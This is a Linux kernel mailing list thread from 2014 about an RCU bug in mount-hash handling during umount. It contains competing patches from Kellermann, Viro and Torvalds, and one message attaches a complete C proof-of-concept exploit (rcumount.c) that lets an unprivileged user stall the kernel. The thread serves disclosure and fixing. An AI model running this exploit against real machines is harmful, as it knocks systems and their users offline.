* [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:22 Max Kellermann
2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
` (2 more replies)
0 siblings, 3 replies; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.
The right way to delete items from a RCU-protected list is
list_del_rcu(). Before the item is inserted into another list
(completing the list_move), synchronize_rcu() must be called.
umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call. This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.
In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).
The fix is to avoid reusing "mnt_hash". This patch adds a new
list_head attribute dedicated for umounting. This avoids clobbering
mnt_hash.next, allowing all rcu_locked threads to continue walk the
list until namespace_unlock() is called.
This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/mount.h | 1 +
fs/namespace.c | 12 +++++++-----
fs/pnode.c | 8 +++++---
3 files changed, 13 insertions(+), 8 deletions(-)
diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
int mnt_count;
int mnt_writers;
#endif
+ struct list_head mnt_unmounted; /* list of mounts being unmounted */
struct list_head mnt_mounts; /* list of children, anchored here */
struct list_head mnt_child; /* and going through their mnt_child */
struct list_head mnt_instance; /* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
synchronize_rcu();
while (!list_empty(&head)) {
- mnt = list_first_entry(&head, struct mount, mnt_hash);
- list_del_init(&mnt->mnt_hash);
+ mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+ list_del_init(&mnt->mnt_unmounted);
if (mnt->mnt_ex_mountpoint.mnt)
path_put(&mnt->mnt_ex_mountpoint);
mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
LIST_HEAD(tmp_list);
struct mount *p;
- for (p = mnt; p; p = next_mnt(p, mnt))
- list_move(&p->mnt_hash, &tmp_list);
+ for (p = mnt; p; p = next_mnt(p, mnt)) {
+ list_del_rcu(&p->mnt_hash);
+ list_add(&p->mnt_unmounted, &tmp_list);
+ }
if (how)
propagate_umount(&tmp_list);
- list_for_each_entry(p, &tmp_list, mnt_hash) {
+ list_for_each_entry(p, &tmp_list, mnt_unmounted) {
list_del_init(&p->mnt_expire);
list_del_init(&p->mnt_list);
__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..4bca573 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
* umount the child only if the child has no
* other children
*/
- if (child && list_empty(&child->mnt_mounts))
- list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+ if (child && list_empty(&child->mnt_mounts)) {
+ list_del_rcu(&child->mnt_hash);
+ list_add(&child->mnt_unmounted, &mnt->mnt_hash);
+ }
}
}
@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
{
struct mount *mnt;
- list_for_each_entry(mnt, list, mnt_hash)
+ list_for_each_entry(mnt, list, mnt_unmounted)
__propagate_umount(mnt);
return 0;
}
^ permalink raw reply related [flat|nested] 9+ messages in thread* [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash 2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann @ 2014-03-19 21:22 ` Max Kellermann 2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann 2014-03-19 21:37 ` Max Kellermann 2 siblings, 0 replies; 9+ messages in thread From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw) To: viro; +Cc: max, linux-kernel mount.mnt_hash is RCU-protected, and therefore we must use the RCU variants to manipulate the list. Signed-off-by: Max Kellermann <mk@cm4all.com> --- fs/namespace.c | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/fs/namespace.c b/fs/namespace.c index 2aa0a14..295a0c0 100644 --- a/fs/namespace.c +++ b/fs/namespace.c @@ -22,6 +22,7 @@ #include <linux/fsnotify.h> /* fsnotify_vfsmount_delete */ #include <linux/uaccess.h> #include <linux/proc_ns.h> +#include <linux/rculist.h> #include <linux/magic.h> #include "pnode.h" #include "internal.h" @@ -739,8 +740,8 @@ static void attach_mnt(struct mount *mnt, struct mountpoint *mp) { mnt_set_mountpoint(parent, mp, mnt); - list_add_tail(&mnt->mnt_hash, mount_hashtable + - hash(&parent->mnt, mp->m_dentry)); + list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable + + hash(&parent->mnt, mp->m_dentry)); list_add_tail(&mnt->mnt_child, &parent->mnt_mounts); } @@ -762,8 +763,8 @@ static void commit_tree(struct mount *mnt) list_splice(&head, n->list.prev); - list_add_tail(&mnt->mnt_hash, mount_hashtable + - hash(&parent->mnt, mnt->mnt_mountpoint)); + list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable + + hash(&parent->mnt, mnt->mnt_mountpoint)); list_add_tail(&mnt->mnt_child, &parent->mnt_mounts); touch_mnt_namespace(n); } ^ permalink raw reply related [flat|nested] 9+ messages in thread
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting 2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann 2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann @ 2014-03-19 21:24 ` Max Kellermann 2014-03-19 21:37 ` Max Kellermann 2 siblings, 0 replies; 9+ messages in thread From: Max Kellermann @ 2014-03-19 21:24 UTC (permalink / raw) To: viro, linux-kernel [-- Attachment #1: Type: text/plain, Size: 250 bytes --] On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote: > In the presence of user+mount namespaces, this bug can be exploited by > any unprivileged user to stall the kernel (denial of service by soft > lockup). Proof-of-concept exploit attached. [-- Attachment #2: rcumount.c --] [-- Type: text/x-csrc, Size: 1878 bytes --] /* * Exploit for linux commit 48a066e72d970a3e225a9c18690d570c736fc455: * endless loop in __lookup_mnt() because the mount_hashtable does not * have enough RCU protection. * * How to use: * * gcc -D_GNU_SOURCE -std=gnu99 -o rcumount rcumount.c && ./rcumount * * Wait a few minutes until "rcu_sched self-detected stall" appears. * The machine is now unusable. * * Author: Max Kellermann <max@duempel.org> */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/wait.h> #include <sched.h> #include <sys/mount.h> #include <sys/stat.h> static void stress(void) { /* make all mounts private so our namespace "owns" them */ mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL); while (1) { /* stress the mount_hashtable which will at some point modify a list_head which is rcu-protected but still referenced by another kernel thread; this may or may not lead this other kernel thread into an endless loop inside __lookup_mnt() never sees the head again */ if (mount("none", "/tmp", "tmpfs", 0, "size=16M,nr_inodes=256") == 0) umount2("/tmp", MNT_DETACH); /* ask the kernel to walk the mount hash, which may trigger the __lookup_mnt() */ struct stat st; stat("/tmp/..", &st); } } static int fn(void *arg) { (void)arg; /* launch child processes */ for (unsigned i = 0; i < 32; ++i) { if (fork() == 0) { stress(); exit(0); } } /* cleanup */ int status; do {} while(wait(&status) > 0); return 0; } int main(int argc, char **argv) { /* create a new user+vfs namespace which allows us to mount() */ char stack[65536]; clone(fn, stack + sizeof(stack), SIGCHLD|CLONE_NEWNS|CLONE_NEWUSER, NULL); /* cleanup */ int status; wait(&status); } ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting 2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann 2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann 2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann @ 2014-03-19 21:37 ` Max Kellermann 2014-03-19 21:39 ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann 2 siblings, 1 reply; 9+ messages in thread From: Max Kellermann @ 2014-03-19 21:37 UTC (permalink / raw) To: viro; +Cc: linux-kernel On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote: > + list_add(&child->mnt_unmounted, &mnt->mnt_hash); This is obviously a bug in my patch, sorry. Will resend a fixed patch. ^ permalink raw reply [flat|nested] 9+ messages in thread
* [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] 2014-03-19 21:37 ` Max Kellermann @ 2014-03-19 21:39 ` Max Kellermann 2014-03-20 3:48 ` Al Viro 0 siblings, 1 reply; 9+ messages in thread From: Max Kellermann @ 2014-03-19 21:39 UTC (permalink / raw) To: viro; +Cc: max, linux-kernel mount.mnt_hash is RCU-protected. However, list_move() breaks RCU protection: when one thread walks the linked list while another calls list_move(), it may "redirect" the first thread into the new list, making it loop endlessly in __lookup_mnt(), because the list head is never found. The right way to delete items from a RCU-protected list is list_del_rcu(). Before the item is inserted into another list (completing the list_move), synchronize_rcu() must be called. umount_tree() has code to implement this kind of protection; it moves the "mount" object to the global list "unmounted", to be cleaned up by namespace_unlock() after a synchronize_rcu() call. This however did not work because umount_tree() reused the "mnt_hash" attribute for the "unmounted" list. In the presence of user+mount namespaces, this bug can be exploited by any unprivileged user to stall the kernel (denial of service by soft lockup). The fix is to avoid reusing "mnt_hash". This patch adds a new list_head attribute dedicated for umounting. This avoids clobbering mnt_hash.next, allowing all rcu_locked threads to continue walk the list until namespace_unlock() is called. This regression was caused by commit 48a066e7 ("RCU'd vfsmounts"). All releases since 3.12-rc5 are affected. Signed-off-by: Max Kellermann <mk@cm4all.com> --- fs/mount.h | 1 + fs/namespace.c | 12 +++++++----- fs/pnode.c | 8 +++++--- 3 files changed, 13 insertions(+), 8 deletions(-) diff --git a/fs/mount.h b/fs/mount.h index a17458c..9cfdf94 100644 --- a/fs/mount.h +++ b/fs/mount.h @@ -36,6 +36,7 @@ struct mount { int mnt_count; int mnt_writers; #endif + struct list_head mnt_unmounted; /* list of mounts being unmounted */ struct list_head mnt_mounts; /* list of children, anchored here */ struct list_head mnt_child; /* and going through their mnt_child */ struct list_head mnt_instance; /* mount instance on sb->s_mounts */ diff --git a/fs/namespace.c b/fs/namespace.c index 338ccc2..2aa0a14 100644 --- a/fs/namespace.c +++ b/fs/namespace.c @@ -1171,8 +1171,8 @@ static void namespace_unlock(void) synchronize_rcu(); while (!list_empty(&head)) { - mnt = list_first_entry(&head, struct mount, mnt_hash); - list_del_init(&mnt->mnt_hash); + mnt = list_first_entry(&head, struct mount, mnt_unmounted); + list_del_init(&mnt->mnt_unmounted); if (mnt->mnt_ex_mountpoint.mnt) path_put(&mnt->mnt_ex_mountpoint); mntput(&mnt->mnt); @@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how) LIST_HEAD(tmp_list); struct mount *p; - for (p = mnt; p; p = next_mnt(p, mnt)) - list_move(&p->mnt_hash, &tmp_list); + for (p = mnt; p; p = next_mnt(p, mnt)) { + list_del_rcu(&p->mnt_hash); + list_add(&p->mnt_unmounted, &tmp_list); + } if (how) propagate_umount(&tmp_list); - list_for_each_entry(p, &tmp_list, mnt_hash) { + list_for_each_entry(p, &tmp_list, mnt_unmounted) { list_del_init(&p->mnt_expire); list_del_init(&p->mnt_list); __touch_mnt_namespace(p->mnt_ns); diff --git a/fs/pnode.c b/fs/pnode.c index c7221bb..c16c5d64 100644 --- a/fs/pnode.c +++ b/fs/pnode.c @@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt) * umount the child only if the child has no * other children */ - if (child && list_empty(&child->mnt_mounts)) - list_move_tail(&child->mnt_hash, &mnt->mnt_hash); + if (child && list_empty(&child->mnt_mounts)) { + list_del_rcu(&child->mnt_hash); + list_add(&child->mnt_unmounted, &mnt->mnt_unmounted); + } } } @@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list) { struct mount *mnt; - list_for_each_entry(mnt, list, mnt_hash) + list_for_each_entry(mnt, list, mnt_unmounted) __propagate_umount(mnt); return 0; } ^ permalink raw reply related [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] 2014-03-19 21:39 ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann @ 2014-03-20 3:48 ` Al Viro 2014-03-20 4:02 ` Linus Torvalds 0 siblings, 1 reply; 9+ messages in thread From: Al Viro @ 2014-03-20 3:48 UTC (permalink / raw) To: Max Kellermann; +Cc: max, linux-kernel, Linus Torvalds On Wed, Mar 19, 2014 at 10:39:45PM +0100, Max Kellermann wrote: > mount.mnt_hash is RCU-protected. However, list_move() breaks RCU > protection: when one thread walks the linked list while another calls > list_move(), it may "redirect" the first thread into the new list, > making it loop endlessly in __lookup_mnt(), because the list head is > never found. > The right way to delete items from a RCU-protected list is > list_del_rcu(). Before the item is inserted into another list > (completing the list_move), synchronize_rcu() must be called. > The fix is to avoid reusing "mnt_hash". This patch adds a new > list_head attribute dedicated for umounting. This avoids clobbering > mnt_hash.next, allowing all rcu_locked threads to continue walk the > list until namespace_unlock() is called. NAK. Nice catch, the bug is real, but the fix is wrong. For one thing, you have missed detach_mnt()/attach_mnt(), so you are not covering all places where the sucker might be removed from the list. For another, I don't believe that this is the right approach. The *only* thing we care about is not getting stuck in __lookup_mnt(). If it misses an entry because something in front of it just got moved around, etc., we are fine. We'll notice that mount_lock mismatch and that'll be it. IOW, there are two problems here: (1) we can, indeed, get caught into an infinite loop. (2) __follow_mount_rcu() and follow_mount_rcu() ought to recheck nd->m_seq and bugger off with ECHILD in case of mismatch (the latter probably ought to be folded into follow_dotdot_rcu()). legitimize_mnt() will fail in the end of lookup *and* we are risking an incorrect hard error if we fail to cross a mountpoint and continue under it. I would prefer to deal with (1) by turning mnt_hash into hlist; the problem with that is __lookup_mnt_last(). That sucker is only called under mount_lock, so RCU issues do not play there, but it's there and it complicates things. There might be a way to get rid of that thing for good, but that's more invasive than what I'd be happy with for backports. Let's just have __lookup_mnt() recheck mount_lock if it goes for too long - e.g. every 256 iterations (and if the hash chain is that long, the price of extra smp_rmb() + fetching seqcount won't matter anyway). And have the fs/namei.c callers check nd->m_seq properly (lookup_mnt() already does). I've looked into taking the check into __lookup_mnt() itself, but it leads to clumsier calling conventions and worse code in callers. How about the following (completely untested yet): diff --git a/fs/mount.h b/fs/mount.h index 46790ae1..905d1bc 100644 --- a/fs/mount.h +++ b/fs/mount.h @@ -77,7 +77,7 @@ static inline int is_mounted(struct vfsmount *mnt) return !IS_ERR_OR_NULL(real_mount(mnt)->mnt_ns); } -extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *); +extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *, unsigned seq); extern struct mount *__lookup_mnt_last(struct vfsmount *, struct dentry *); extern bool legitimize_mnt(struct vfsmount *, unsigned); diff --git a/fs/namei.c b/fs/namei.c index d6e32a1..458572b 100644 --- a/fs/namei.c +++ b/fs/namei.c @@ -1115,7 +1115,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path, if (!d_mountpoint(path->dentry)) break; - mounted = __lookup_mnt(path->mnt, path->dentry); + mounted = __lookup_mnt(path->mnt, path->dentry, nd->m_seq); if (!mounted) break; path->mnt = &mounted->mnt; @@ -1129,20 +1129,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path, */ *inode = path->dentry->d_inode; } - return true; -} - -static void follow_mount_rcu(struct nameidata *nd) -{ - while (d_mountpoint(nd->path.dentry)) { - struct mount *mounted; - mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry); - if (!mounted) - break; - nd->path.mnt = &mounted->mnt; - nd->path.dentry = mounted->mnt.mnt_root; - nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq); - } + return read_seqretry(&mount_lock, nd->m_seq); } static int follow_dotdot_rcu(struct nameidata *nd) @@ -1170,7 +1157,17 @@ static int follow_dotdot_rcu(struct nameidata *nd) break; nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq); } - follow_mount_rcu(nd); + while (d_mountpoint(nd->path.dentry)) { + struct mount *mounted; + mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry, nd->m_seq); + if (!mounted) + break; + nd->path.mnt = &mounted->mnt; + nd->path.dentry = mounted->mnt.mnt_root; + nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq); + if (!read_seqretry(&mount_lock, nd->m_seq)) + goto failed; + } nd->inode = nd->path.dentry->d_inode; return 0; diff --git a/fs/namespace.c b/fs/namespace.c index 203475b..72c20b0 100644 --- a/fs/namespace.c +++ b/fs/namespace.c @@ -599,16 +599,23 @@ bool legitimize_mnt(struct vfsmount *bastard, unsigned seq) /* * find the first mount at @dentry on vfsmount @mnt. - * call under rcu_read_lock() + * call under rcu_read_lock(). seq is normally *not* checked - that's + * for the caller to deal with; here we are just breaking infinite loops. + * If we get hash chains longer than 256 elements, the price of extra + * smp_rmb() won't matter. */ -struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry) +struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry, unsigned seq) { struct list_head *head = m_hash(mnt, dentry); struct mount *p; + unsigned char n = 0; - list_for_each_entry_rcu(p, head, mnt_hash) + list_for_each_entry_rcu(p, head, mnt_hash) { + if (unlikely(!--n) && !read_seqretry(&mount_lock, seq)) + break; if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry) return p; + } return NULL; } @@ -652,7 +659,7 @@ struct vfsmount *lookup_mnt(struct path *path) rcu_read_lock(); do { seq = read_seqbegin(&mount_lock); - child_mnt = __lookup_mnt(path->mnt, path->dentry); + child_mnt = __lookup_mnt(path->mnt, path->dentry, seq); m = child_mnt ? &child_mnt->mnt : NULL; } while (!legitimize_mnt(m, seq)); rcu_read_unlock(); ^ permalink raw reply related [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] 2014-03-20 3:48 ` Al Viro @ 2014-03-20 4:02 ` Linus Torvalds 2014-03-20 4:21 ` Al Viro 0 siblings, 1 reply; 9+ messages in thread From: Linus Torvalds @ 2014-03-20 4:02 UTC (permalink / raw) To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List On Wed, Mar 19, 2014 at 8:48 PM, Al Viro <viro@zeniv.linux.org.uk> wrote: > > NAK. Nice catch, the bug is real, but the fix is wrong. For one thing, > you have missed detach_mnt()/attach_mnt(), so you are not covering > all places where the sucker might be removed from the list. For another, > I don't believe that this is the right approach. > > The *only* thing we care about is not getting stuck in __lookup_mnt(). Quite frankly, if that's the main issue, then may I suggest aiming to use a 'hlist' instead of a doubly-linked list? Those have the advantage that they are NULL-terminated. Yeah, hlists have some disadvantages too, which might not make them work in this case, but really, for mnt_hash? hlists are generally *exactly* what you want for hash lists, because the head is smaller. And because of the NULL termination rather than having the head used in the middle of a circular list, you don't get the termination problems when moving entries across chains. I did not look whether there was some reason a hlist isn't appropriate here. Maybe you can tell me. Or go "yeah, a hlist would work nicely". Linus ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] 2014-03-20 4:02 ` Linus Torvalds @ 2014-03-20 4:21 ` Al Viro 2014-03-20 4:58 ` Linus Torvalds 0 siblings, 1 reply; 9+ messages in thread From: Al Viro @ 2014-03-20 4:21 UTC (permalink / raw) To: Linus Torvalds; +Cc: Max Kellermann, max, Linux Kernel Mailing List On Wed, Mar 19, 2014 at 09:02:33PM -0700, Linus Torvalds wrote: > Quite frankly, if that's the main issue, then may I suggest aiming to > use a 'hlist' instead of a doubly-linked list? Those have the > advantage that they are NULL-terminated. > > Yeah, hlists have some disadvantages too, which might not make them > work in this case, but really, for mnt_hash? hlists are generally > *exactly* what you want for hash lists, because the head is smaller. > And because of the NULL termination rather than having the head used > in the middle of a circular list, you don't get the termination > problems when moving entries across chains. > > I did not look whether there was some reason a hlist isn't appropriate > here. Maybe you can tell me. Er... I have, actually, right in the part you've snipped ;-) <unsnip> I would prefer to deal with (1) by turning mnt_hash into hlist; the problem with that is __lookup_mnt_last(). That sucker is only called under mount_lock, so RCU issues do not play there, but it's there and it complicates things. There might be a way to get rid of that thing for good, but that's more invasive than what I'd be happy with for backports. </unsnip> hlist _is_ better, no questions there, but surgery required to deal with __lookup_mnt_last()[1] is too invasive for backports and even more so - for -final. I would prefer to have the merge window happen after LSF/MM, obviously, but I thought you wanted to open it this Sunday? [1] that is, with cases like "/tmp/b is a slave of /tmp/a, bind foo on /tmp/b/c, then bind bar on /tmp/a/c, then umount /tmp/a/c". The only kinda-sorta sane semantics we'd been able to come up with is what we do right now and that's where __lookup_mnt_last() has come from. ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] 2014-03-20 4:21 ` Al Viro @ 2014-03-20 4:58 ` Linus Torvalds 0 siblings, 0 replies; 9+ messages in thread From: Linus Torvalds @ 2014-03-20 4:58 UTC (permalink / raw) To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List On Wed, Mar 19, 2014 at 9:21 PM, Al Viro <viro@zeniv.linux.org.uk> wrote: > > Er... I have, actually, right in the part you've snipped ;-) Heh. That's what I get for just reading the patch, and skimming the explanation. > I would prefer to deal with (1) by turning mnt_hash into hlist; the problem > with that is __lookup_mnt_last(). That sucker is only called under > mount_lock, so RCU issues do not play there, but it's there and it > complicates things. There might be a way to get rid of that thing for > good, but that's more invasive than what I'd be happy with for backports. Yeah. I see what you're saying. That said, if we expect the mnt_hash queues to be short (and they really should be), that whole __lookup_mnt_last() could just be struct mount *p, *result = NULL; hlist_for_each_entry(p, head, mnt_hash) if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry) result = p; return result; which is certainly simple. Sure, it always walks the whole list, but as far as I can tell the callers aren't exactly performance-critical, and we're talking about a hlist that should be just a couple of entries in size.. So if that's the _only_ thing holding back using hlists, I'd say we should just do the above trivial conversion. Linus ^ permalink raw reply [flat|nested] 9+ messages in thread
end of thread, other threads:[~2014-03-20 4:58 UTC | newest] Thread overview: 9+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann 2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann 2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann 2014-03-19 21:37 ` Max Kellermann 2014-03-19 21:39 ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann 2014-03-20 3:48 ` Al Viro 2014-03-20 4:02 ` Linus Torvalds 2014-03-20 4:21 ` Al Viro 2014-03-20 4:58 ` Linus Torvalds
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox